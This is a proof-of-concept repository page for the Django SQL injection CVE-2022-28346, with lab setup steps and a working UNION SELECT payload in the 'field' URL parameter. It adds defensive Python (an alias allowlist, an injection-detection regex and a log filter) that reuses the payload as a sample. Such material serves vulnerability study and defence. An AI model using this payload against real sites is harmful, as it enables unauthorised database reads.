CVE-2022-28346 PoC — Django SQL injection vulnerability

Source
Associated Vulnerability
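Title: Django SQL injection vulnerability (CVE-2022-28346)
Description: Django is an open-source web application framework from the Django Foundation, written in Python. The framework includes an object-oriented mapper, a view system, a template system, and more. Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4 contain a SQL injection vulnerability: QuerySet.annotate(), aggregate(), and extra() are subject to SQL injection.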
Description
Django QuerySet.annotate(), aggregate(), extra() SQL injection
Readme
### CVE-2022-28346
Django QuerySet.annotate(), aggregate(), extra() SQL injection

### Environment setup
```
1. python manage.py makemigrations
2. python manage.py migrate
3. Visit http://x.x.x.x:8000/ to insert the initial data
```

### Reproducing the vulnerability

```
Visit http://x.x.x.x:8000/demo
POC: http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
```

![image-20220426224053969](./image-20220426224053969.png)
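
An added example (not code from the PoC repository or from Django): validating a client-supplied alias before it is used as a keyword name for `annotate()`, `aggregate()` or `extra()`, and flagging requests like the one above in access logs. The regular expression is an assumed form of the alias check in patched Django releases; `ALLOWED_ALIASES`, `safe_alias` and `flag_requests` are hypothetical names, and the sample URLs are constructed.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Characters with no place in a SQL column alias: quotes, brackets, semicolons,
# whitespace and comment markers. Assumed form of the framework-side check.
FORBIDDEN_ALIAS = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")

# Hypothetical allowlist: the only aliases this view exposes to clients.
ALLOWED_ALIASES = frozenset({"name", "total"})


def safe_alias(value):
    """Return value if it may be used as a keyword name for annotate(),
    aggregate() or extra(); raise ValueError otherwise."""
    if FORBIDDEN_ALIAS.search(value):
        raise ValueError("alias contains quotes, whitespace or SQL comment markers")
    if value not in ALLOWED_ALIASES:
        raise ValueError("alias is not on the allowlist")
    return value


def flag_requests(urls, param="field"):
    """Return the URLs whose `param` value could not be a legitimate alias."""
    flagged = []
    for url in urls:
        values = parse_qs(urlsplit(url).query).get(param, [])
        if any(FORBIDDEN_ALIAS.search(v) for v in values):
            flagged.append(url)
    return flagged


# The value from the reproduction step above, and constructed request URLs.
POC_VALUE = 'demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --'
SAMPLE_URLS = [
    "http://x.x.x.x:8000/demo?" + urlencode({"field": "name"}),
    "http://x.x.x.x:8000/demo?" + urlencode({"field": POC_VALUE}),
]

if __name__ == "__main__":
    for candidate in ("name", "password", POC_VALUE):
        try:
            print("accepted:", safe_alias(candidate))
        except ValueError as exc:
            print("rejected:", repr(candidate), "-", exc)
    print("flagged:", flag_requests(SAMPLE_URLS))
```

The allowlist is the primary control; the pattern check remains useful on unpatched versions and as a log-detection rule.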

### Docker

```
docker pull s0cke3t/cve-2022-28346:latest
```

File Snapshot

```
[4.0K]  /data/pocs/4f13296ee29192f3975f2f5bf776039e54a12b18
├── [4.0K]  CVE_2022_28346
│   ├── [ 405]  asgi.py
│   ├── [   0]  __init__.py
│   ├── [3.2K]  settings.py
│   ├── [ 811]  urls.py
│   └── [ 405]  wsgi.py
├── [4.0K]  demo
│   ├── [  63]  admin.py
│   ├── [ 140]  apps.py
│   ├── [   0]  __init__.py
│   ├── [4.0K]  migrations
│   │   ├── [ 485]  0001_initial.py
│   │   └── [   0]  __init__.py
│   ├── [ 177]  models.py
│   ├── [  60]  tests.py
│   └── [ 592]  views.py
├── [ 46K]  image-20220426224053969.png
├── [ 670]  manage.py
├── [ 506]  README.md
└── [  14]  requirements.txt

3 directories, 17 files
```